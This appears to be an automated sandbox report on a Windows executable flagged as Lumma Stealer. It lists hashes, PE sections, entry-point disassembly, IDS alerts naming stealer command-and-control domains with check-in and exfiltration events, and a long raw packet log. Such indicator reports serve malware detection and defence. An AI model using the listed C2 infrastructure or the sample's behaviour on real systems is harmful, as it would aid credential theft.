                                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                                        Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="643603" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                                                                                                                                                                                                                                                                        Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                        File Type:MS Windows registry file, NT/2000 or above
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):1835008
                                                                                                                                                                                                                                                                        Entropy (8bit):4.298825575077335
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:6144:OECqOEmWfd+WQFIy/9026ZTyaRsCDusBqD5dooi8lrSD6VJSRYO:jCVL6seqD5SySWVARJ
                                                                                                                                                                                                                                                                        MD5:789AAF67EA0B47FFCBBD9E56001A8494
                                                                                                                                                                                                                                                                        SHA1:D42D3E813BA0162965F49502B23658F2955455DD
                                                                                                                                                                                                                                                                        SHA-256:3B0D1B4CDA2DEA9565C7E64616A182BE72AE28E7E3B79E834DE40F2EF91FCEDA
                                                                                                                                                                                                                                                                        SHA-512:6724EE331F7BA8F169768E17A5CCAA15A7A1A1A7DC9A0965774E1C5C795035521A00656DEFF9E126B142F28C36976966804C4019DC65136C22F3F07D82E59548
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                                        File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                        Entropy (8bit):6.51426597263154
                                                                                                                                                                                                                                                                        TrID:
                                                                                                                                                                                                                                                                        • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                                                                                                                                                                                        • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                                                                                                                                                                        • DOS Executable Generic (2002/1) 0.02%
                                                                                                                                                                                                                                                                        • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                                                                                                                                                        File name:jSFUzuYPG9.exe
                                                                                                                                                                                                                                                                        File size:2'870'272 bytes
                                                                                                                                                                                                                                                                        MD5:820f418e980b172684fe96e4aa6e50a5
                                                                                                                                                                                                                                                                        SHA1:a5498979325229c5494a01fddd7e8013750a5ce7
                                                                                                                                                                                                                                                                        SHA256:06472667e63bfd7ffdf64b3de9b839207e2b0ab1ae17d60f6a6ad75d6fbd2800
                                                                                                                                                                                                                                                                        SHA512:b51717685d89a9f3e693157933449ae55803c5a6717f58aaa32da87f41c8af7f02629ddaf14212baa1fea57a8d76d0244eec0ba204e0e80d0fdd76d45d2f9b00
                                                                                                                                                                                                                                                                        SSDEEP:49152:HIuyataMx0UWqXz/dnL/RirQgyuPyskVLRlizFNFNjdyRZiP/Ww08:HIuyijx0/2LRL/RirQpuPnkTlgAjiP/J
                                                                                                                                                                                                                                                                        TLSH:5AD53AA2B54972CFD4CA16F89427CD8A595E03F8871148F7AD1C747ABEA3CC116B6C2C
                                                                                                                                                                                                                                                                        File Content Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....<_g..........................................@..................................i,...@.................................T0..h..
                                                                                                                                                                                                                                                                        Icon Hash:90cececece8e8eb0
                                                                                                                                                                                                                                                                        Entrypoint:0x6ea000
                                                                                                                                                                                                                                                                        Entrypoint Section:.taggant
                                                                                                                                                                                                                                                                        Digitally signed:false
                                                                                                                                                                                                                                                                        Imagebase:0x400000
                                                                                                                                                                                                                                                                        Subsystem:windows gui
                                                                                                                                                                                                                                                                        Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                                                                                                                                                                                        DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                                                                                                                                                                                                                                                                        Time Stamp:0x675F3CD1 [Sun Dec 15 20:32:17 2024 UTC]
                                                                                                                                                                                                                                                                        TLS Callbacks:
                                                                                                                                                                                                                                                                        CLR (.Net) Version:
                                                                                                                                                                                                                                                                        OS Version Major:6
                                                                                                                                                                                                                                                                        OS Version Minor:0
                                                                                                                                                                                                                                                                        File Version Major:6
                                                                                                                                                                                                                                                                        File Version Minor:0
                                                                                                                                                                                                                                                                        Subsystem Version Major:6
                                                                                                                                                                                                                                                                        Subsystem Version Minor:0
                                                                                                                                                                                                                                                                        Import Hash:2eabe9054cad5152567f0699947a2c5b
                                                                                                                                                                                                                                                                        Instruction
                                                                                                                                                                                                                                                                        jmp 00007F4BA0E37D6Ah
                                                                                                                                                                                                                                                                        rsm
                                                                                                                                                                                                                                                                        sub eax, dword ptr [eax]
                                                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                                                        jmp 00007F4BA0E39D65h
                                                                                                                                                                                                                                                                        add byte ptr [esi], al
                                                                                                                                                                                                                                                                        or al, byte ptr [eax]
                                                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                                                        add byte ptr [eax], dh
                                                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                                                        add byte ptr [eax+eax], al
                                                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                                                        add byte ptr [eax], al
| Name | Virtual Address | Virtual Size | Is in Section |
|---|---|---|---|
| IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_IMPORT | 0x53054 | 0x68 | .idata |
| IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x531f8 | 0x8 | .idata |
| IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_IAT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 | |

| Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics |
|---|---|---|---|---|---|---|---|---|---|
| | 0x1000 | 0x51000 | 0x24800 | 108e5ff974ff8cd1c1d13f1fe9631ffd | False | 0.9974114404965754 | data | 7.9813529381203026 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE |
| .rsrc | 0x52000 | 0x1000 | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE |
| .idata | 0x53000 | 0x1000 | 0x200 | 19a29171433eeef17e42fd663f137134 | False | 0.14453125 | data | 0.9996515881509258 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE |
| trstwfmm | 0x54000 | 0x295000 | 0x294c00 | bf5c807fb08ce7073286d6c7cbe897ce | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE |
| ekycdelp | 0x2e9000 | 0x1000 | 0x400 | 24e18729601be92642d3e89035d32268 | False | 0.8203125 | data | 6.3212326982952005 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE |
| .taggant | 0x2ea000 | 0x3000 | 0x2200 | fc5b824799d34e0f5b9bc245fe9b150d | False | 0.058823529411764705 | DOS executable (COM) | 0.7886049500640178 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE |

| DLL | Import |
|---|---|
| kernel32.dll | lstrcpy |

| Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol |
|---|---|---|---|---|---|---|---|---|
| 2024-12-23T08:40:35.343969+0100 | 2058378 | ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (sweepyribs .lat) | 1 | 192.168.2.11 | 58057 | 1.1.1.1 | 53 | UDP |
| 2024-12-23T08:40:35.718564+0100 | 2058364 | ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (grannyejh .lat) | 1 | 192.168.2.11 | 65433 | 1.1.1.1 | 53 | UDP |
| 2024-12-23T08:40:35.999353+0100 | 2058360 | ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (discokeyus .lat) | 1 | 192.168.2.11 | 50665 | 1.1.1.1 | 53 | UDP |
| 2024-12-23T08:40:36.142280+0100 | 2058370 | ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (necklacebudi .lat) | 1 | 192.168.2.11 | 54667 | 1.1.1.1 | 53 | UDP |
| 2024-12-23T08:40:36.285155+0100 | 2058362 | ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (energyaffai .lat) | 1 | 192.168.2.11 | 60253 | 1.1.1.1 | 53 | UDP |
| 2024-12-23T08:40:36.428034+0100 | 2058354 | ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (aspecteirs .lat) | 1 | 192.168.2.11 | 51180 | 1.1.1.1 | 53 | UDP |
| 2024-12-23T08:40:36.569423+0100 | 2058376 | ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (sustainskelet .lat) | 1 | 192.168.2.11 | 60277 | 1.1.1.1 | 53 | UDP |
| 2024-12-23T08:40:36.727425+0100 | 2058358 | ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (crosshuaht .lat) | 1 | 192.168.2.11 | 55218 | 1.1.1.1 | 53 | UDP |
| 2024-12-23T08:40:36.867809+0100 | 2058374 | ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (rapeflowwj .lat) | 1 | 192.168.2.11 | 63590 | 1.1.1.1 | 53 | UDP |
| 2024-12-23T08:40:38.549640+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.11 | 49709 | 23.55.153.106 | 443 | TCP |
| 2024-12-23T08:40:39.420367+0100 | 2858666 | ETPRO MALWARE Win32/Lumma Stealer Steam Profile Lookup | 1 | 192.168.2.11 | 49709 | 23.55.153.106 | 443 | TCP |
| 2024-12-23T08:40:40.997004+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.11 | 49715 | 104.21.66.86 | 443 | TCP |
                                                                                                                                                                                                                                                                        2024-12-23T08:40:41.741365+01002049836ET MALWARE Lumma Stealer Related Activity1192.168.2.1149715104.21.66.86443TCP
                                                                                                                                                                                                                                                                        2024-12-23T08:40:41.741365+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.1149715104.21.66.86443TCP
                                                                                                                                                                                                                                                                        2024-12-23T08:40:42.981050+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.1149721104.21.66.86443TCP
                                                                                                                                                                                                                                                                        2024-12-23T08:40:44.039796+01002049812ET MALWARE Lumma Stealer Related Activity M21192.168.2.1149721104.21.66.86443TCP
                                                                                                                                                                                                                                                                        2024-12-23T08:40:44.039796+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.1149721104.21.66.86443TCP
                                                                                                                                                                                                                                                                        2024-12-23T08:40:45.632810+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.1149727104.21.66.86443TCP
                                                                                                                                                                                                                                                                        2024-12-23T08:40:48.117262+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.1149733104.21.66.86443TCP
                                                                                                                                                                                                                                                                        2024-12-23T08:40:48.992739+01002048094ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration1192.168.2.1149733104.21.66.86443TCP
                                                                                                                                                                                                                                                                        2024-12-23T08:40:50.552331+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.1149739104.21.66.86443TCP
                                                                                                                                                                                                                                                                        2024-12-23T08:40:53.051762+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.1149748104.21.66.86443TCP
                                                                                                                                                                                                                                                                        2024-12-23T08:40:55.611278+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.1149755104.21.66.86443TCP
                                                                                                                                                                                                                                                                        2024-12-23T08:41:00.848841+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.1149767104.21.66.86443TCP
                                                                                                                                                                                                                                                                        2024-12-23T08:41:01.601046+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.1149767104.21.66.86443TCP
                                                                                                                                                                                                                                                                        2024-12-23T08:41:03.133628+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.1149772185.166.143.49443TCP
                                                                                                                                                                                                                                                                        2024-12-23T08:41:05.548672+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.114977752.216.152.124443TCP
Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                                                                                                                                                                                                                                        Dec 23, 2024 08:40:44.040257931 CET44349721104.21.66.86192.168.2.11
                                                                                                                                                                                                                                                                        Dec 23, 2024 08:40:44.046329975 CET44349721104.21.66.86192.168.2.11
                                                                                                                                                                                                                                                                        Dec 23, 2024 08:40:44.046375990 CET49721443192.168.2.11104.21.66.86
                                                                                                                                                                                                                                                                        Dec 23, 2024 08:40:44.046381950 CET44349721104.21.66.86192.168.2.11
                                                                                                                                                                                                                                                                        Dec 23, 2024 08:40:44.055066109 CET44349721104.21.66.86192.168.2.11
                                                                                                                                                                                                                                                                        Dec 23, 2024 08:40:44.055131912 CET49721443192.168.2.11104.21.66.86
                                                                                                                                                                                                                                                                        Dec 23, 2024 08:40:44.055140972 CET44349721104.21.66.86192.168.2.11
                                                                                                                                                                                                                                                                        Dec 23, 2024 08:40:44.109710932 CET49721443192.168.2.11104.21.66.86
                                                                                                                                                                                                                                                                        Dec 23, 2024 08:40:44.109719992 CET44349721104.21.66.86192.168.2.11
                                                                                                                                                                                                                                                                        Dec 23, 2024 08:40:44.156572104 CET49721443192.168.2.11104.21.66.86
                                                                                                                                                                                                                                                                        Dec 23, 2024 08:40:44.159298897 CET44349721104.21.66.86192.168.2.11
                                                                                                                                                                                                                                                                        Dec 23, 2024 08:40:44.203450918 CET49721443192.168.2.11104.21.66.86
                                                                                                                                                                                                                                                                        Dec 23, 2024 08:40:44.231719971 CET44349721104.21.66.86192.168.2.11
                                                                                                                                                                                                                                                                        Dec 23, 2024 08:40:44.235600948 CET44349721104.21.66.86192.168.2.11
                                                                                                                                                                                                                                                                        Dec 23, 2024 08:40:44.235630035 CET44349721104.21.66.86192.168.2.11
                                                                                                                                                                                                                                                                        Dec 23, 2024 08:40:44.235647917 CET49721443192.168.2.11104.21.66.86
                                                                                                                                                                                                                                                                        Dec 23, 2024 08:40:44.235668898 CET44349721104.21.66.86192.168.2.11
                                                                                                                                                                                                                                                                        Dec 23, 2024 08:40:44.235709906 CET49721443192.168.2.11104.21.66.86
                                                                                                                                                                                                                                                                        Dec 23, 2024 08:40:44.235714912 CET44349721104.21.66.86192.168.2.11
                                                                                                                                                                                                                                                                        Dec 23, 2024 08:40:44.235749006 CET44349721104.21.66.86192.168.2.11
                                                                                                                                                                                                                                                                        Dec 23, 2024 08:40:44.235794067 CET49721443192.168.2.11104.21.66.86
                                                                                                                                                                                                                                                                        Dec 23, 2024 08:40:44.266623020 CET49721443192.168.2.11104.21.66.86
                                                                                                                                                                                                                                                                        Dec 23, 2024 08:40:44.266645908 CET44349721104.21.66.86192.168.2.11
                                                                                                                                                                                                                                                                        Dec 23, 2024 08:40:44.266655922 CET49721443192.168.2.11104.21.66.86
                                                                                                                                                                                                                                                                        Dec 23, 2024 08:40:44.266663074 CET44349721104.21.66.86192.168.2.11
                                                                                                                                                                                                                                                                        Dec 23, 2024 08:40:44.421633005 CET49727443192.168.2.11104.21.66.86
                                                                                                                                                                                                                                                                        Dec 23, 2024 08:40:44.421681881 CET44349727104.21.66.86192.168.2.11
                                                                                                                                                                                                                                                                        Dec 23, 2024 08:40:44.421756029 CET49727443192.168.2.11104.21.66.86
                                                                                                                                                                                                                                                                        Dec 23, 2024 08:40:44.422135115 CET49727443192.168.2.11104.21.66.86
                                                                                                                                                                                                                                                                        Dec 23, 2024 08:40:44.422152042 CET44349727104.21.66.86192.168.2.11
                                                                                                                                                                                                                                                                        Dec 23, 2024 08:40:45.632694960 CET44349727104.21.66.86192.168.2.11
                                                                                                                                                                                                                                                                        Dec 23, 2024 08:40:45.632810116 CET49727443192.168.2.11104.21.66.86
                                                                                                                                                                                                                                                                        Dec 23, 2024 08:40:45.634270906 CET49727443192.168.2.11104.21.66.86
                                                                                                                                                                                                                                                                        Dec 23, 2024 08:40:45.634293079 CET44349727104.21.66.86192.168.2.11
                                                                                                                                                                                                                                                                        Dec 23, 2024 08:40:45.634541988 CET44349727104.21.66.86192.168.2.11
                                                                                                                                                                                                                                                                        Dec 23, 2024 08:40:45.639539957 CET49727443192.168.2.11104.21.66.86
                                                                                                                                                                                                                                                                        Dec 23, 2024 08:40:45.639662027 CET49727443192.168.2.11104.21.66.86
                                                                                                                                                                                                                                                                        Dec 23, 2024 08:40:45.639677048 CET44349727104.21.66.86192.168.2.11
                                                                                                                                                                                                                                                                        Dec 23, 2024 08:40:45.639698982 CET49727443192.168.2.11104.21.66.86
                                                                                                                                                                                                                                                                        Dec 23, 2024 08:40:45.639739990 CET44349727104.21.66.86192.168.2.11
                                                                                                                                                                                                                                                                        Dec 23, 2024 08:40:46.744690895 CET44349727104.21.66.86192.168.2.11
                                                                                                                                                                                                                                                                        Dec 23, 2024 08:40:46.744971037 CET44349727104.21.66.86192.168.2.11
                                                                                                                                                                                                                                                                        Dec 23, 2024 08:40:46.745146990 CET49727443192.168.2.11104.21.66.86
                                                                                                                                                                                                                                                                        Dec 23, 2024 08:40:46.745146990 CET49727443192.168.2.11104.21.66.86
                                                                                                                                                                                                                                                                        Dec 23, 2024 08:40:46.892537117 CET49733443192.168.2.11104.21.66.86
                                                                                                                                                                                                                                                                        Dec 23, 2024 08:40:46.892574072 CET44349733104.21.66.86192.168.2.11
                                                                                                                                                                                                                                                                        Dec 23, 2024 08:40:46.892709970 CET49733443192.168.2.11104.21.66.86
                                                                                                                                                                                                                                                                        Dec 23, 2024 08:40:46.892978907 CET49733443192.168.2.11104.21.66.86
                                                                                                                                                                                                                                                                        Dec 23, 2024 08:40:46.892993927 CET44349733104.21.66.86192.168.2.11
                                                                                                                                                                                                                                                                        Dec 23, 2024 08:40:47.047182083 CET49727443192.168.2.11104.21.66.86
                                                                                                                                                                                                                                                                        Dec 23, 2024 08:40:47.047218084 CET44349727104.21.66.86192.168.2.11
                                                                                                                                                                                                                                                                        Dec 23, 2024 08:40:48.117162943 CET44349733104.21.66.86192.168.2.11
                                                                                                                                                                                                                                                                        Dec 23, 2024 08:40:48.117261887 CET49733443192.168.2.11104.21.66.86
                                                                                                                                                                                                                                                                        Dec 23, 2024 08:40:48.118536949 CET49733443192.168.2.11104.21.66.86
                                                                                                                                                                                                                                                                        Dec 23, 2024 08:40:48.118552923 CET44349733104.21.66.86192.168.2.11
                                                                                                                                                                                                                                                                        Dec 23, 2024 08:40:48.118803024 CET44349733104.21.66.86192.168.2.11
                                                                                                                                                                                                                                                                        Dec 23, 2024 08:40:48.120167971 CET49733443192.168.2.11104.21.66.86
                                                                                                                                                                                                                                                                        Dec 23, 2024 08:40:48.120281935 CET49733443192.168.2.11104.21.66.86
                                                                                                                                                                                                                                                                        Dec 23, 2024 08:40:48.120316982 CET44349733104.21.66.86192.168.2.11
                                                                                                                                                                                                                                                                        Dec 23, 2024 08:40:48.120428085 CET49733443192.168.2.11104.21.66.86
                                                                                                                                                                                                                                                                        Dec 23, 2024 08:40:48.163341045 CET44349733104.21.66.86192.168.2.11
                                                                                                                                                                                                                                                                        Dec 23, 2024 08:40:48.992757082 CET44349733104.21.66.86192.168.2.11
                                                                                                                                                                                                                                                                        Dec 23, 2024 08:40:48.992855072 CET44349733104.21.66.86192.168.2.11
                                                                                                                                                                                                                                                                        Dec 23, 2024 08:40:48.992908955 CET49733443192.168.2.11104.21.66.86
                                                                                                                                                                                                                                                                        Dec 23, 2024 08:40:48.993273020 CET49733443192.168.2.11104.21.66.86
                                                                                                                                                                                                                                                                        Dec 23, 2024 08:40:48.993294001 CET44349733104.21.66.86192.168.2.11
                                                                                                                                                                                                                                                                        Dec 23, 2024 08:40:49.311765909 CET49739443192.168.2.11104.21.66.86
                                                                                                                                                                                                                                                                        Dec 23, 2024 08:40:49.311809063 CET44349739104.21.66.86192.168.2.11
                                                                                                                                                                                                                                                                        Dec 23, 2024 08:40:49.311876059 CET49739443192.168.2.11104.21.66.86
                                                                                                                                                                                                                                                                        Dec 23, 2024 08:40:49.312413931 CET49739443192.168.2.11104.21.66.86
                                                                                                                                                                                                                                                                        Dec 23, 2024 08:40:49.312434912 CET44349739104.21.66.86192.168.2.11
                                                                                                                                                                                                                                                                        Dec 23, 2024 08:40:50.552247047 CET44349739104.21.66.86192.168.2.11
                                                                                                                                                                                                                                                                        Dec 23, 2024 08:40:50.552330971 CET49739443192.168.2.11104.21.66.86
                                                                                                                                                                                                                                                                        Dec 23, 2024 08:40:50.553832054 CET49739443192.168.2.11104.21.66.86
                                                                                                                                                                                                                                                                        Dec 23, 2024 08:40:50.553843975 CET44349739104.21.66.86192.168.2.11
                                                                                                                                                                                                                                                                        Dec 23, 2024 08:40:50.554163933 CET44349739104.21.66.86192.168.2.11
                                                                                                                                                                                                                                                                        Dec 23, 2024 08:40:50.555493116 CET49739443192.168.2.11104.21.66.86
                                                                                                                                                                                                                                                                        Dec 23, 2024 08:40:50.555627108 CET49739443192.168.2.11104.21.66.86
                                                                                                                                                                                                                                                                        Dec 23, 2024 08:40:50.555651903 CET44349739104.21.66.86192.168.2.11
                                                                                                                                                                                                                                                                        Dec 23, 2024 08:40:50.555717945 CET49739443192.168.2.11104.21.66.86
                                                                                                                                                                                                                                                                        Dec 23, 2024 08:40:50.555725098 CET44349739104.21.66.86192.168.2.11
                                                                                                                                                                                                                                                                        Dec 23, 2024 08:40:51.518652916 CET44349739104.21.66.86192.168.2.11
                                                                                                                                                                                                                                                                        Dec 23, 2024 08:40:51.518755913 CET44349739104.21.66.86192.168.2.11
                                                                                                                                                                                                                                                                        Dec 23, 2024 08:41:05.548671961 CET49777443192.168.2.1152.216.152.124
                                                                                                                                                                                                                                                                        Dec 23, 2024 08:41:05.550317049 CET49777443192.168.2.1152.216.152.124
                                                                                                                                                                                                                                                                        Dec 23, 2024 08:41:05.550331116 CET4434977752.216.152.124192.168.2.11
                                                                                                                                                                                                                                                                        Dec 23, 2024 08:41:05.550575972 CET4434977752.216.152.124192.168.2.11
                                                                                                                                                                                                                                                                        Dec 23, 2024 08:41:05.551856041 CET49777443192.168.2.1152.216.152.124
                                                                                                                                                                                                                                                                        Dec 23, 2024 08:41:05.595357895 CET4434977752.216.152.124192.168.2.11
                                                                                                                                                                                                                                                                        Dec 23, 2024 08:41:06.018600941 CET4434977752.216.152.124192.168.2.11
                                                                                                                                                                                                                                                                        Dec 23, 2024 08:41:06.062966108 CET49777443192.168.2.1152.216.152.124
                                                                                                                                                                                                                                                                        Dec 23, 2024 08:41:06.068731070 CET4434977752.216.152.124192.168.2.11
                                                                                                                                                                                                                                                                        Dec 23, 2024 08:41:06.068747044 CET4434977752.216.152.124192.168.2.11
                                                                                                                                                                                                                                                                        Dec 23, 2024 08:41:06.068770885 CET4434977752.216.152.124192.168.2.11
                                                                                                                                                                                                                                                                        Dec 23, 2024 08:41:06.068794966 CET4434977752.216.152.124192.168.2.11
                                                                                                                                                                                                                                                                        Dec 23, 2024 08:41:06.068859100 CET49777443192.168.2.1152.216.152.124
                                                                                                                                                                                                                                                                        Dec 23, 2024 08:41:06.068867922 CET4434977752.216.152.124192.168.2.11
                                                                                                                                                                                                                                                                        Dec 23, 2024 08:41:06.068901062 CET49777443192.168.2.1152.216.152.124
                                                                                                                                                                                                                                                                        Dec 23, 2024 08:41:06.068944931 CET49777443192.168.2.1152.216.152.124
                                                                                                                                                                                                                                                                        Dec 23, 2024 08:41:06.247196913 CET4434977752.216.152.124192.168.2.11
                                                                                                                                                                                                                                                                        Dec 23, 2024 08:41:06.247231007 CET4434977752.216.152.124192.168.2.11
                                                                                                                                                                                                                                                                        Dec 23, 2024 08:41:06.247277021 CET4434977752.216.152.124192.168.2.11
                                                                                                                                                                                                                                                                        Dec 23, 2024 08:41:06.247287989 CET49777443192.168.2.1152.216.152.124
                                                                                                                                                                                                                                                                        Dec 23, 2024 08:41:06.247309923 CET4434977752.216.152.124192.168.2.11
                                                                                                                                                                                                                                                                        Dec 23, 2024 08:41:06.247354984 CET49777443192.168.2.1152.216.152.124
                                                                                                                                                                                                                                                                        Dec 23, 2024 08:41:06.297298908 CET49777443192.168.2.1152.216.152.124
                                                                                                                                                                                                                                                                        Dec 23, 2024 08:41:06.301868916 CET4434977752.216.152.124192.168.2.11
                                                                                                                                                                                                                                                                        Dec 23, 2024 08:41:06.301898956 CET4434977752.216.152.124192.168.2.11
                                                                                                                                                                                                                                                                        Dec 23, 2024 08:41:06.301961899 CET49777443192.168.2.1152.216.152.124
                                                                                                                                                                                                                                                                        Dec 23, 2024 08:41:06.301969051 CET4434977752.216.152.124192.168.2.11
                                                                                                                                                                                                                                                                        Dec 23, 2024 08:41:06.302064896 CET49777443192.168.2.1152.216.152.124
                                                                                                                                                                                                                                                                        Dec 23, 2024 08:41:06.302064896 CET49777443192.168.2.1152.216.152.124
                                                                                                                                                                                                                                                                        Dec 23, 2024 08:41:06.309549093 CET4434977752.216.152.124192.168.2.11
                                                                                                                                                                                                                                                                        Dec 23, 2024 08:41:06.309648037 CET4434977752.216.152.124192.168.2.11
                                                                                                                                                                                                                                                                        Dec 23, 2024 08:41:06.309703112 CET49777443192.168.2.1152.216.152.124
                                                                                                                                                                                                                                                                        Dec 23, 2024 08:41:06.309715986 CET4434977752.216.152.124192.168.2.11
                                                                                                                                                                                                                                                                        Dec 23, 2024 08:41:06.359746933 CET49777443192.168.2.1152.216.152.124
                                                                                                                                                                                                                                                                        Dec 23, 2024 08:41:06.406056881 CET4434977752.216.152.124192.168.2.11
                                                                                                                                                                                                                                                                        Dec 23, 2024 08:41:06.406073093 CET4434977752.216.152.124192.168.2.11
                                                                                                                                                                                                                                                                        Dec 23, 2024 08:41:06.406177998 CET49777443192.168.2.1152.216.152.124
                                                                                                                                                                                                                                                                        Dec 23, 2024 08:41:06.406196117 CET4434977752.216.152.124192.168.2.11
                                                                                                                                                                                                                                                                        Dec 23, 2024 08:41:06.446229935 CET4434977752.216.152.124192.168.2.11
                                                                                                                                                                                                                                                                        Dec 23, 2024 08:41:06.446259975 CET4434977752.216.152.124192.168.2.11
                                                                                                                                                                                                                                                                        Dec 23, 2024 08:41:06.446269989 CET4434977752.216.152.124192.168.2.11
                                                                                                                                                                                                                                                                        Dec 23, 2024 08:41:06.446372986 CET49777443192.168.2.1152.216.152.124
                                                                                                                                                                                                                                                                        Dec 23, 2024 08:41:06.446381092 CET4434977752.216.152.124192.168.2.11
                                                                                                                                                                                                                                                                        Dec 23, 2024 08:41:06.500340939 CET49777443192.168.2.1152.216.152.124
                                                                                                                                                                                                                                                                        Dec 23, 2024 08:41:06.500348091 CET4434977752.216.152.124192.168.2.11
                                                                                                                                                                                                                                                                        Dec 23, 2024 08:41:06.547249079 CET49777443192.168.2.1152.216.152.124
                                                                                                                                                                                                                                                                        Dec 23, 2024 08:41:06.598134995 CET4434977752.216.152.124192.168.2.11
